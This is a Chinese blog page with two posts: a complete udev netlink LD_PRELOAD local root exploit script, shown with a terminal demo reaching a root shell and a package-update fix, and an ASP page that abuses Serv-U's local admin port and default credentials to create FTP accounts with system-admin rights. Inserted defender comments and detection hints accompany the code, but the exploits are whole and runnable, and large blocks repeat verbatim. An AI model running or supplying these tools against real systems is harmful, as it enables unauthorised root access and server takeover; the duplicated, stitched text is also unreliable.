普通用户通过udev漏洞提升到root权限
[ 2009/06/25 17:30 | by selboo ]
udev权限提升的漏洞,只要有普通用户权限,即可提升到root权限
udev.sh
演示自己看了
修复漏洞
[selboo@selboo ~]$ rpm -qa |grep udev
udev-095-14.16.el5
[selboo@selboo ~]$ yum update udev
[selboo@selboo ~]$ rpm -qa |grep udev
udev-095-14.20.el5_3
udev.sh
#!/bin/sh
# Linux 2.6
# bug found by Sebastian Krahmer
#
# lame sploit using LD technique
# by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
#
# WARNING: maybe needs some FIXUP to work flawlessly
## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang
#
# Review notes (defender's view). The script runs three stages:
#   1. udev.c   - from an unprivileged process, send one uevent-style netlink
#      message to the socket whose netlink pid is given as $1; among its
#      KEY=VALUE entries the message carries LD_PRELOAD=/tmp/libno_ex.so.1.0.
#   2. program.c - the preloaded library's _init() switches to uid/gid 0 and
#      turns /tmp/suid into a root-owned setuid binary. That only has an
#      effect if the process that loaded the library already runs as root
#      (udevd or a helper it starts with the injected environment - inferred
#      from the script header, not shown here).
#   3. suid.c   - /tmp/suid exec's a shell as uid 0.
# The fix shown on this page is a plain package update
# (udev-095-14.16.el5 -> udev-095-14.20.el5_3); presumably the patched udevd
# no longer honours uevents that come from a userspace sender - confirm
# against the udev changelog.
# Detection hints, using only the paths hard-coded below: /tmp/udev,
# /tmp/libno_ex.so.1.0 and a setuid-root /tmp/suid appearing on a host, and
# udevd child processes whose environment contains LD_PRELOAD.
cat > udev.c << _EOF
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>
#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0
// File-scope state used by main(). Only socket_fd, address, msg and iovector
// are read; sz is assigned here and never used.
int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;
// Entry point. argv[1] must be the netlink pid of the udevd socket (see the
// script header). argc is never checked, so running the binary without an
// argument passes argv[1] == NULL to atoi(). Implicit int return type.
main(int argc, char **argv) {
char sysfspath[SHORT_STRING];
char subsystem[SHORT_STRING];
char event[SHORT_STRING];
char major[SHORT_STRING];
char minor[SHORT_STRING];
// Fixed uevent fields: a fake "add" of block device 8:1 at /dev/foo.
sprintf(event, "add");
sprintf(subsystem, "block");
sprintf(sysfspath, "/dev/foo");
sprintf(major, "8");
sprintf(minor, "1");
// Destination: unicast to the netlink pid from the command line, no
// multicast groups.
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
// bind() reuses the destination address struct as the local address. The
// results of socket(), bind() and sendmsg() are never checked.
socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
// Payload layout: an "action@devpath" header followed by KEY=VALUE strings,
// each kept with its own NUL terminator (the +1 after every sprintf). The
// last entry is the LD_PRELOAD variable the "LD technique" in the script
// header refers to.
char message[LONG_STRING];
char *mp;
mp = message;
mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
mp += sprintf(mp, "ACTION=%s", event) +1;
mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
mp += sprintf(mp, "MAJOR=%s", major) +1;
mp += sprintf(mp, "MINOR=%s", minor) +1;
mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
mp += sprintf(mp, "LD_PRELOAD=/tmp/libno_ex.so.1.0") +1;
// The whole buffer, NULs included, goes out as a single datagram.
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
// buf and buflen are assigned but never used.
char *buf;
int buflen;
buf = (char *) &msg;
buflen = (int)(mp-message);
sendmsg(socket_fd, &msg, 0);
close(socket_fd);
// Presumably leaves the receiver time to process the event before the
// script goes on to run /tmp/suid - confirm.
sleep(10);
// execl("/tmp/suid", "suid", (void*)0);
}
_EOF
# Stage 1 binary.
gcc udev.c -o /tmp/udev
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/stat.h>
// Library initialiser. The link step below passes -nostartfiles, so this
// _init is the library's ELF init routine and runs as soon as the library is
// loaded via LD_PRELOAD. setgid/setuid(0) only succeed in an already
// privileged process; their return values are not checked.
void _init()
{
setgid(0);
setuid(0);
// Presumably removed so that programs exec'd afterwards do not load this
// library again - confirm.
unsetenv("LD_PRELOAD");
// execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);
// Make /tmp/suid root-owned with mode 4705 (setuid, rwx for owner, r-x for
// others).
chown("/tmp/suid",0,0);
chmod("/tmp/suid",S_IRUSR|S_IWUSR|S_ISUID|S_IXUSR|S_IROTH|S_IXOTH);
}
_EOF
gcc -o program.o -c program.c -fPIC
# Builds the shared object named in the LD_PRELOAD entry sent by stage 1;
# -nostartfiles keeps the hand-written _init above as the init routine.
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cat > suid.c << _EOF
// Stage 3. No headers are included, so execl() is implicitly declared; that
// is the "incompatible implicit declaration" warning in the transcript on
// this page. The trailing 0 is an int literal rather than a null pointer.
int main(void) {
setgid(0); setuid(0);
execl("/bin/sh","sh",0); }
_EOF
gcc -o /tmp/suid suid.c
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
# Stage 1: the script's only argument is the netlink pid (usage on this
# page: sh udev.sh <pid>).
/tmp/udev $1
# milw0rm.com [2009-04-20]
# Stage 3: only yields a root shell if stage 2 ran as root and changed the
# ownership and mode of /tmp/suid.
/tmp/suid
# Linux 2.6
# bug found by Sebastian Krahmer
#
# lame sploit using LD technique
# by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
#
# WARNING: maybe needs some FIXUP to work flawlessly
## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang
#
# Review notes (defender's view). The script runs three stages:
#   1. udev.c   - from an unprivileged process, send one uevent-style netlink
#      message to the socket whose netlink pid is given as $1; among its
#      KEY=VALUE entries the message carries LD_PRELOAD=/tmp/libno_ex.so.1.0.
#   2. program.c - the preloaded library's _init() switches to uid/gid 0 and
#      turns /tmp/suid into a root-owned setuid binary. That only has an
#      effect if the process that loaded the library already runs as root
#      (udevd or a helper it starts with the injected environment - inferred
#      from the script header, not shown here).
#   3. suid.c   - /tmp/suid exec's a shell as uid 0.
# The fix shown on this page is a plain package update
# (udev-095-14.16.el5 -> udev-095-14.20.el5_3); presumably the patched udevd
# no longer honours uevents that come from a userspace sender - confirm
# against the udev changelog.
# Detection hints, using only the paths hard-coded below: /tmp/udev,
# /tmp/libno_ex.so.1.0 and a setuid-root /tmp/suid appearing on a host, and
# udevd child processes whose environment contains LD_PRELOAD.
cat > udev.c << _EOF
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>
#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0
// File-scope state used by main(). Only socket_fd, address, msg and iovector
// are read; sz is assigned here and never used.
int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;
// Entry point. argv[1] must be the netlink pid of the udevd socket (see the
// script header). argc is never checked, so running the binary without an
// argument passes argv[1] == NULL to atoi(). Implicit int return type.
main(int argc, char **argv) {
char sysfspath[SHORT_STRING];
char subsystem[SHORT_STRING];
char event[SHORT_STRING];
char major[SHORT_STRING];
char minor[SHORT_STRING];
// Fixed uevent fields: a fake "add" of block device 8:1 at /dev/foo.
sprintf(event, "add");
sprintf(subsystem, "block");
sprintf(sysfspath, "/dev/foo");
sprintf(major, "8");
sprintf(minor, "1");
// Destination: unicast to the netlink pid from the command line, no
// multicast groups.
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
// bind() reuses the destination address struct as the local address. The
// results of socket(), bind() and sendmsg() are never checked.
socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
// Payload layout: an "action@devpath" header followed by KEY=VALUE strings,
// each kept with its own NUL terminator (the +1 after every sprintf). The
// last entry is the LD_PRELOAD variable the "LD technique" in the script
// header refers to.
char message[LONG_STRING];
char *mp;
mp = message;
mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
mp += sprintf(mp, "ACTION=%s", event) +1;
mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
mp += sprintf(mp, "MAJOR=%s", major) +1;
mp += sprintf(mp, "MINOR=%s", minor) +1;
mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
mp += sprintf(mp, "LD_PRELOAD=/tmp/libno_ex.so.1.0") +1;
// The whole buffer, NULs included, goes out as a single datagram.
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
// buf and buflen are assigned but never used.
char *buf;
int buflen;
buf = (char *) &msg;
buflen = (int)(mp-message);
sendmsg(socket_fd, &msg, 0);
close(socket_fd);
// Presumably leaves the receiver time to process the event before the
// script goes on to run /tmp/suid - confirm.
sleep(10);
// execl("/tmp/suid", "suid", (void*)0);
}
_EOF
# Stage 1 binary.
gcc udev.c -o /tmp/udev
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/stat.h>
// Library initialiser. The link step below passes -nostartfiles, so this
// _init is the library's ELF init routine and runs as soon as the library is
// loaded via LD_PRELOAD. setgid/setuid(0) only succeed in an already
// privileged process; their return values are not checked.
void _init()
{
setgid(0);
setuid(0);
// Presumably removed so that programs exec'd afterwards do not load this
// library again - confirm.
unsetenv("LD_PRELOAD");
// execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);
// Make /tmp/suid root-owned with mode 4705 (setuid, rwx for owner, r-x for
// others).
chown("/tmp/suid",0,0);
chmod("/tmp/suid",S_IRUSR|S_IWUSR|S_ISUID|S_IXUSR|S_IROTH|S_IXOTH);
}
_EOF
gcc -o program.o -c program.c -fPIC
# Builds the shared object named in the LD_PRELOAD entry sent by stage 1;
# -nostartfiles keeps the hand-written _init above as the init routine.
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cat > suid.c << _EOF
// Stage 3. No headers are included, so execl() is implicitly declared; that
// is the "incompatible implicit declaration" warning in the transcript on
// this page. The trailing 0 is an int literal rather than a null pointer.
int main(void) {
setgid(0); setuid(0);
execl("/bin/sh","sh",0); }
_EOF
gcc -o /tmp/suid suid.c
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
# Stage 1: the script's only argument is the netlink pid (usage on this
# page: sh udev.sh <pid>).
/tmp/udev $1
# milw0rm.com [2009-04-20]
# Stage 3: only yields a root shell if stage 2 ran as root and changed the
# ownership and mode of /tmp/suid.
/tmp/suid
演示自己看了
[selboo@selboo ~]$ id
uid=501(selboo) gid=501(selboo) groups=501(selboo)
[selboo@selboo ~]$ ps -ef |grep udev
root 775 1 0 Jun13 ? 00:00:00 /sbin/udevd -d
selboo 762 31582 0 17:05 pts/1 00:00:00 grep udev
[selboo@selboo ~]$ sh udev.sh 774 # 775-1=774
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
sh-3.2# id
uid=0(root) gid=0(root) groups=501(selboo)
sh-3.2# ls /root/
cnc.txt cnc1.txt installonlyn.py nginx_log.sh rsync.sh whois
sh-3.2#
uid=501(selboo) gid=501(selboo) groups=501(selboo)
[selboo@selboo ~]$ ps -ef |grep udev
root 775 1 0 Jun13 ? 00:00:00 /sbin/udevd -d
selboo 762 31582 0 17:05 pts/1 00:00:00 grep udev
[selboo@selboo ~]$ sh udev.sh 774 # 775-1=774
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
sh-3.2# id
uid=0(root) gid=0(root) groups=501(selboo)
sh-3.2# ls /root/
cnc.txt cnc1.txt installonlyn.py nginx_log.sh rsync.sh whois
sh-3.2#
修复漏洞
[selboo@selboo ~]$ rpm -qa |grep udev
udev-095-14.16.el5
[selboo@selboo ~]$ yum update udev
[selboo@selboo ~]$ rpm -qa |grep udev
udev-095-14.20.el5_3
Serv-U提权通杀asp脚本(支持SU7)
[ 2008/10/07 11:51 | by selboo ]
文章作者:xiaok[J.L.S.T]
信息来源:安全叶子技术小组[J.Leaves Security Team](http://00day.cn)
一直通杀到su7~~
用来加ftp帐号的......
信息来源:安全叶子技术小组[J.Leaves Security Team](http://00day.cn)
一直通杀到su7~~
用来加ftp帐号的......
<title>Serv-U TOOL</title>
<style type="text/css">
body {
background-color: #333333;
}
a:hover {text-decoration: none;color: #FF0000;}
a:active {text-decoration: none;color: #FF0000;}
.buttom {
color: #333333;
border: 1px solid #000000;
}
.TextBox {border: 1px solid #084B8E}
body,td,th {
color: #CCCCCC;
}
</style>
<p align="center">Serv-U Local Add User with ASP</p>
<p align="center">Author: Xiao.K</p>
<form name="form1" method="post" action="">
<p align="center">
------------------Serv-U Information------------------
<br>
user:
<input name="duser" type="text" class="TextBox" id="duser" value="LocalAdministrator">
<br>
pwd :
<input name="dpwd" type="text" class="TextBox" id="dpwd" value="#l@$ak#.lk;0@P">
<br>
port:
<input name="dport" type="text" class="TextBox" id="dport" value="43958">
<br>
---------------------Add User!!! ---------------------
<BR>
Domain:
<input name="domain" type="text" class="TextBox" id="domain" value="secdst" />
<br>
FTP USER:
<input name="fuser" type="text" class="TextBox" id="fuser" value="xiaok">
<br>
FTP PASS:
<input name="fpass" type="text" class="TextBox" id="fpass" value="bbs.secdst.net">
<br>
FTP PORT:
<input name="fport" type="text" class="TextBox" id="fport" value="21">
<br>
FTP PATH:
<input name="fpath" type="text" class="TextBox" id="fpath" value="c:\\">
<br>
Privilege
<select para=value name="privilege">
<option value=2>Read-only Admin</option>
<option value=3>Group Admin</option>
<option value=4>Domain Admin</option>
<option value=5>System Admin</option>
</select>
</p>
<p align="center">
<input name="radiobutton" type="radio" value="add" checked class="TextBox">
Add User
<input type="radio" name="radiobutton" value="del" class="TextBox">
Del User </p>
<p align="center">
<input name="Submit" type="submit" class="buttom" value="Run" />
</p>
</form>
<%
' Review notes (defender's view). This page does not exploit a flaw in
' Serv-U itself: it logs in to the Serv-U administration interface on
' 127.0.0.1 (port taken from the "dport" field, default 43958) with the local
' administrator credentials pre-filled in the form above, then issues
' SITE MAINTENANCE commands to create or delete an FTP account. The only
' precondition is being able to run an .asp page on the same host as Serv-U.
' Mitigation therefore starts with keeping untrusted files out of the web
' root and with watching loopback connections to the admin port that
' originate from the web-server process. Whether the maintenance commands
' below show up in the Serv-U log is not shown here - verify before relying
' on that for detection.
'
' Form fields are taken as-is; nothing is validated or escaped.
user = request.Form("duser")
pass = request.Form("dpwd")
port = request.Form("dport")
domain = request.Form("domain")
fuser = request.Form("fuser")
fpass = request.Form("fpass")
fport = request.Form("fport")
fpath = request.Form("fpath")
privilege=request.Form("privilege")
' Maps the option value to the -Maintenance= keyword. NOTE(review):
' request.Form yields a string, so whether "2" matches Case 2 depends on
' VBScript's variant comparison rules - confirm; an unmatched value leaves
' privilege as the raw form text.
select case privilege
case 2:
privilege="ReadOnly"
case 3:
privilege="Group"
case 4:
privilege="Domain"
case 5:
privilege="System"
end select
if request.Form("radiobutton") = "add" Then
' Command stream: USER/PASS login, SITE MAINTENANCE, then the -SETDOMAIN and
' -SETUSERSETUP blocks, one key per vbCrLf-terminated line. Field values are
' concatenated into this stream without any validation.
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=" & domain &"|0.0.0.0|" & fport & "|-1|1|0" & vbCrLf & "-DynDNSEnable=0" & vbCrLf & " DynIPName=" & vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & fport & vbCrLf & "-User="& fuser & vbCrLf & "-Password=" & fpass & vbCrLf & _
"-HomeDir=" & fpath & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
"-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
"-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
"-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
"-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
"-Maintenance=" & privilege & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=" & fpath &"|RWAMELCDP" & vbCrLf
quit = "QUIT" & vbCrLf
'--------
'On Error Resume Next
' Asynchronous POST (third argument True). The response is never read, so
' the confirmation written below does not mean the command succeeded.
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "POST", "http://127.0.0.1:"& port &"/secdst",True, "", ""
xPost.Send loginuser & loginpass & mt & newdomain & newuser & quit
Set xPost =nothing
response.write "<div align="&chr(34 )&"center"&chr(34 )&">FTP user "&fuser&" pass "&fpass&" at port "& fport &"</div>"
elseif request.Form("radiobutton") = "del" Then
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
deluser = "-DELETEUSER" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & port & vbcrlf & " User="& fuser & vbcrlf
quit = "QUIT" & vbCrLf
' Same pattern as the add branch, through the MSXML2.XMLHTTP progid this
' time; again asynchronous and unchecked.
Set xPost3 = CreateObject("MSXML2.XMLHTTP")
xPost3.Open "POST", "http://127.0.0.1:"& port &"/secdst", True
xPost3.Send loginuser & loginpass & mt & deluser & quit
Set xPOST3=nothing
response.write "<div align="&chr(34 )&"center"&chr(34 )&">FTP user "&fuser&" pass "&fpass&" at port "& fport &" have deleted</div>"
else
response.write "<div align="&chr(34 )&"center"&chr(34 )&">let's Start!!!</div>"
end if
%>
<style type="text/css">
body {
background-color: #333333;
}
a:hover {text-decoration: none;color: #FF0000;}
a:active {text-decoration: none;color: #FF0000;}
.buttom {
color: #333333;
border: 1px solid #000000;
}
.TextBox {border: 1px solid #084B8E}
body,td,th {
color: #CCCCCC;
}
</style>
<p align="center">Serv-U Local Add User with ASP</p>
<p align="center">Author: Xiao.K</p>
<form name="form1" method="post" action="">
<p align="center">
------------------Serv-U Information------------------
<br>
user:
<input name="duser" type="text" class="TextBox" id="duser" value="LocalAdministrator">
<br>
pwd :
<input name="dpwd" type="text" class="TextBox" id="dpwd" value="#l@$ak#.lk;0@P">
<br>
port:
<input name="dport" type="text" class="TextBox" id="dport" value="43958">
<br>
---------------------Add User!!! ---------------------
<BR>
Domain:
<input name="domain" type="text" class="TextBox" id="domain" value="secdst" />
<br>
FTP USER:
<input name="fuser" type="text" class="TextBox" id="fuser" value="xiaok">
<br>
FTP PASS:
<input name="fpass" type="text" class="TextBox" id="fpass" value="bbs.secdst.net">
<br>
FTP PORT:
<input name="fport" type="text" class="TextBox" id="fport" value="21">
<br>
FTP PATH:
<input name="fpath" type="text" class="TextBox" id="fpath" value="c:\\">
<br>
Privilege
<select para=value name="privilege">
<option value=2>Read-only Admin</option>
<option value=3>Group Admin</option>
<option value=4>Domain Admin</option>
<option value=5>System Admin</option>
</select>
</p>
<p align="center">
<input name="radiobutton" type="radio" value="add" checked class="TextBox">
Add User
<input type="radio" name="radiobutton" value="del" class="TextBox">
Del User </p>
<p align="center">
<input name="Submit" type="submit" class="buttom" value="Run" />
</p>
</form>
<%
' Review notes (defender's view). This page does not exploit a flaw in
' Serv-U itself: it logs in to the Serv-U administration interface on
' 127.0.0.1 (port taken from the "dport" field, default 43958) with the local
' administrator credentials pre-filled in the form above, then issues
' SITE MAINTENANCE commands to create or delete an FTP account. The only
' precondition is being able to run an .asp page on the same host as Serv-U.
' Mitigation therefore starts with keeping untrusted files out of the web
' root and with watching loopback connections to the admin port that
' originate from the web-server process. Whether the maintenance commands
' below show up in the Serv-U log is not shown here - verify before relying
' on that for detection.
'
' Form fields are taken as-is; nothing is validated or escaped.
user = request.Form("duser")
pass = request.Form("dpwd")
port = request.Form("dport")
domain = request.Form("domain")
fuser = request.Form("fuser")
fpass = request.Form("fpass")
fport = request.Form("fport")
fpath = request.Form("fpath")
privilege=request.Form("privilege")
' Maps the option value to the -Maintenance= keyword. NOTE(review):
' request.Form yields a string, so whether "2" matches Case 2 depends on
' VBScript's variant comparison rules - confirm; an unmatched value leaves
' privilege as the raw form text.
select case privilege
case 2:
privilege="ReadOnly"
case 3:
privilege="Group"
case 4:
privilege="Domain"
case 5:
privilege="System"
end select
if request.Form("radiobutton") = "add" Then
' Command stream: USER/PASS login, SITE MAINTENANCE, then the -SETDOMAIN and
' -SETUSERSETUP blocks, one key per vbCrLf-terminated line. Field values are
' concatenated into this stream without any validation.
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=" & domain &"|0.0.0.0|" & fport & "|-1|1|0" & vbCrLf & "-DynDNSEnable=0" & vbCrLf & " DynIPName=" & vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & fport & vbCrLf & "-User="& fuser & vbCrLf & "-Password=" & fpass & vbCrLf & _
"-HomeDir=" & fpath & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
"-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
"-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
"-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
"-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
"-Maintenance=" & privilege & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=" & fpath &"|RWAMELCDP" & vbCrLf
quit = "QUIT" & vbCrLf
'--------
'On Error Resume Next
' Asynchronous POST (third argument True). The response is never read, so
' the confirmation written below does not mean the command succeeded.
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "POST", "http://127.0.0.1:"& port &"/secdst",True, "", ""
xPost.Send loginuser & loginpass & mt & newdomain & newuser & quit
Set xPost =nothing
response.write "<div align="&chr(34 )&"center"&chr(34 )&">FTP user "&fuser&" pass "&fpass&" at port "& fport &"</div>"
elseif request.Form("radiobutton") = "del" Then
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
deluser = "-DELETEUSER" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & port & vbcrlf & " User="& fuser & vbcrlf
quit = "QUIT" & vbCrLf
' Same pattern as the add branch, through the MSXML2.XMLHTTP progid this
' time; again asynchronous and unchecked.
Set xPost3 = CreateObject("MSXML2.XMLHTTP")
xPost3.Open "POST", "http://127.0.0.1:"& port &"/secdst", True
xPost3.Send loginuser & loginpass & mt & deluser & quit
Set xPOST3=nothing
response.write "<div align="&chr(34 )&"center"&chr(34 )&">FTP user "&fuser&" pass "&fpass&" at port "& fport &" have deleted</div>"
else
response.write "<div align="&chr(34 )&"center"&chr(34 )&">let's Start!!!</div>"
end if
%>